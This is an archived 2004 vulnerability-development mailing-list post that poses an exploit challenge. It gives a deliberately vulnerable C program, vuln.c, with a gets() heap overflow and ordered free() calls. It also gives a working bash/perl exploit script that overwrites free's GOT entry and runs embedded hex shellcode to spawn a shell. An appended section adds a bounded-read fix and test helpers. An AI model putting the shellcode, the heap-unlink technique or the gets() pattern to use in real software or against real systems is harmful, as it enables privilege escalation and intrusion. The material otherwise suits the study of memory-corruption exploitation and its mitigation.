Vulnerability Development mailing list archives

challenge


From: "fuzzy () bonbon net" <fuzzy () bonbon net>
Date: Sat, 11 Sep 2004 08:43:29 -0400

//----=[ Challenge ]=----//

Having been with the vulndev mailing list for a while now without 
seeing an exploit challenge, I thought I would offer one up for 
the masses... However this vulnerability is simple in design yet
appears to be difficult to exploit in C...

I have supplied a working bash script for the vuln, but it relies upon
the perl interpreter to supply the payload...

The challenge is to create a working exploit in C, not Perl or bash.


/* vuln.c */
/* familiar? ... */
#include <stdio.h>
#include <stdlib.h>

#define LEN 256

int main(void) {

        char *buf1 = (char *)malloc(LEN);
        char *buf2 = (char *)malloc(LEN);

        printf("buf1: %p\n", buf1);
        printf("buf2: %p\n", buf2);
        gets(buf1);     /* unbounded read into a 256-byte heap chunk: the intended bug */
        free(buf2);     /* buf2 is released before buf1 */
        free(buf1);
        return 0;
}

Notice the gets() function and the ordering of the free()'s..

The bash script using perl is as follows...

#!/bin/sh
# Thanks je
# No error checking
shellcode=`
printf "\xeb\x10AAAABBBBCCCCDDDD"
printf "\x31\xc0\x31\xdb\x31\xc9\xb0\x46\xcd\x80"
printf "\x31\xd2\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62"
printf "\x69\x89\xe3\x52\x53\x89\xe1\x8d\x42\x0b\xcd\x80"
`
prog=./vuln
dest_addr=0x`objdump -R $prog | awk '$3 == "free" { print $1 }'`
code_addr=`perl -e 'printf("0x%08x",0xbfffffff-5-length("'$prog'")-length("'$shellcode'"))'`

echo "Shell dropped"
(perl -e 'print "A"x256 . pack('l', 0) . pack('l', 256+8) .
pack('l','$dest_addr'-12). pack('l', '$code_addr') ."\n"'; cat)| \
env - shellcode=$shellcode \
./vuln

exit 0

Hopefully I shall get responses to this challenge,...

Regards...

//-----=[ EOF ]=-----//
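Added example, not code from the poster or from je's script: the same two-chunk allocation pattern as vuln.c with gets() replaced by a bounded line read. The heap corruption the script above depends on begins with gets() writing past the 256 bytes of buf1 into buf2's chunk header; once the read is capped at the buffer size, the order of the two free() calls stops being a hazard. The helpers bytes_kept() and oversized_line_kept() are hypothetical names added for self-testing and assume POSIX fmemopen(); the inputs they build are constructed.

```c
#define _POSIX_C_SOURCE 200809L
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define LEN 256

/* Read one line into buf, storing at most len-1 bytes plus a NUL.
 * Returns the number of bytes kept, or -1 on EOF/error before any input.
 * If the line is longer than the buffer, the remainder is drained so it
 * is not picked up by the next read. */
long read_line_bounded(char *buf, size_t len, FILE *in) {
    if (buf == NULL || len == 0 || in == NULL)
        return -1;
    if (fgets(buf, (int)len, in) == NULL) {
        buf[0] = '\0';
        return -1;
    }
    size_t n = strlen(buf);
    if (n > 0 && buf[n - 1] == '\n') {
        buf[--n] = '\0';
    } else if (n == len - 1) {
        /* buffer filled without seeing a newline: discard the rest of the line */
        int c;
        while ((c = fgetc(in)) != EOF && c != '\n')
            ;
    }
    return (long)n;
}

/* vuln.c's allocation pattern with gets() replaced by the bounded read.
 * Returns the byte count from read_line_bounded(), or -1 if malloc failed. */
long process(FILE *in) {
    char *buf1 = malloc(LEN);
    char *buf2 = malloc(LEN);
    long n = -1;
    if (buf1 != NULL && buf2 != NULL)
        n = read_line_bounded(buf1, LEN, in);
    free(buf2);   /* same order as vuln.c; harmless now that buf1 cannot overflow */
    free(buf1);
    return n;
}

/* Test helper (hypothetical name): push a constructed in-memory string
 * through process() using POSIX fmemopen(). */
long bytes_kept(const char *input) {
    FILE *f = fmemopen((void *)input, strlen(input), "r");
    if (f == NULL)
        return -1;
    long n = process(f);
    fclose(f);
    return n;
}

/* Constructed oversized input: `count` 'A's, a newline, then a second line.
 * Returns the bytes kept from the first line, or -2 if the drain failed and
 * the second line did not start where expected. */
long oversized_line_kept(size_t count) {
    char *input = malloc(count + 8);
    if (input == NULL)
        return -1;
    memset(input, 'A', count);
    memcpy(input + count, "\nnext\n", 7);   /* 6 chars plus NUL */
    FILE *f = fmemopen(input, count + 6, "r");
    long n = f ? process(f) : -1;
    if (f) {
        char second[LEN];
        if (read_line_bounded(second, LEN, f) != 4 || strcmp(second, "next") != 0)
            n = -2;
        fclose(f);
    }
    free(input);
    return n;
}

int main(void) {
    long n = process(stdin);
    printf("kept %ld bytes\n", n);
    return n < 0;
}
```

Feeding the script's 256 'A's plus the packed words into this version yields a 255-byte string in buf1 and nothing written past it; the drain loop also keeps the surplus bytes from being consumed by a later read as if they were a fresh line.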




